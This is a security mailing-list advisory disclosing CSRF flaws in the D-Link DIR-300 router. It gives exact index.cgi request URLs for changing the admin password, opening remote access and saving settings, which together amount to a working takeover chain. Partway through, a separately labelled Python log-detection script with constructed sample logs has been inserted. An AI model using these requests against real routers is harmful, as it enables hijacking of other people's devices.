Hello list!

Following my previous advisory, here are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300.

-------------------------
Affected products:
-------------------------

The vulnerable model is D-Link DIR-300NRUB5, firmware 1.2.94. All
previous versions should also be vulnerable.

----------
Details:
----------

After the previously disclosed AoF, BF and CSRF vulnerabilities, here are new Cross-Site
Request Forgery holes. To take control of the device, only a few CSRF
requests are needed: change the admin's password (the login is fixed, which is the
earlier mentioned AoF vulnerability), turn on remote access and save the settings.

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Add settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Change current settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Delete settings of remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Save all changes in settings of device:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y
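As an added detection example (not part of this advisory, and not D-Link code), the following script scans web-server or proxy access logs for the state-changing index.cgi requests listed above and flags those whose Referer is not the device's own admin UI, which is how a forged cross-site request typically looks in a log. The log lines, the device address 192.168.0.1 and the third-party referer are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Config objects named in the advisory: id 69 (admin password), id 16 (remote
# access rules); res_cmd=20 commits the pending settings to the device.
SENSITIVE_CONFIG_IDS = {"69": "admin password", "16": "remote access"}
SAVE_CMD = "20"

# Combined Log Format (client, timestamp, request line, status, size, referer, UA).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def classify_request(line, device_hosts):
    """Return a finding for a state-changing index.cgi request whose Referer
    is not one of device_hosts (the router's own admin UI), else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    if url.path != "/index.cgi":
        return None
    q = parse_qs(url.query)
    cfg = q.get("res_config_id", [None])[0]
    if q.get("res_config_action", [None])[0] in ("2", "3") and cfg in SENSITIVE_CONFIG_IDS:
        action = f"write {SENSITIVE_CONFIG_IDS[cfg]} (res_config_id={cfg})"
    elif q.get("res_cmd", [None])[0] == SAVE_CMD:
        action = "save settings (res_cmd=20)"
    else:
        return None
    # Referer is a heuristic only: browsers may strip it and non-browser clients
    # can set it freely, so a missing Referer is flagged but may be benign.
    if urlparse(m.group("referer")).hostname in device_hosts:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "action": action,
            "referer": m.group("referer") or "(none)"}

def scan(log_text, device_hosts):
    """Scan a block of log text; returns the list of flagged requests in order."""
    return [f for f in (classify_request(l, device_hosts) for l in log_text.splitlines()) if f]

# Constructed sample log: three cross-site requests followed by one legitimate
# password change made from the router's own UI at 192.168.0.1.
SAMPLE_LOG = """\
192.168.0.10 - - [30/Sep/2017:10:00:01 +0000] "GET /index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password| HTTP/1.1" 200 12 "http://third-party.example/page.html" "Mozilla/5.0"
192.168.0.10 - - [30/Sep/2017:10:00:02 +0000] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22}&res_pos=-1 HTTP/1.1" 200 12 "http://third-party.example/page.html" "Mozilla/5.0"
192.168.0.10 - - [30/Sep/2017:10:00:03 +0000] "GET /index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y HTTP/1.1" 200 12 "" "Mozilla/5.0"
192.168.0.10 - - [30/Sep/2017:10:05:00 +0000] "GET /index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=newpass| HTTP/1.1" 200 12 "http://192.168.0.1/index.cgi" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, {"192.168.0.1"}):
        print(finding)
```

On a real deployment the device hosts set must list every name or address the admin UI is reached by, otherwise legitimate changes are flagged too.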

------------
Timeline:
------------

2016.03.17 - announced the vulnerabilities in DIR-300 at my site.
2016.08.27 - disclosed the previous advisory about DIR-300 at my site.
2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/).
2014-2018 - informed the developers about multiple vulnerabilities in this and
other D-Link devices.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/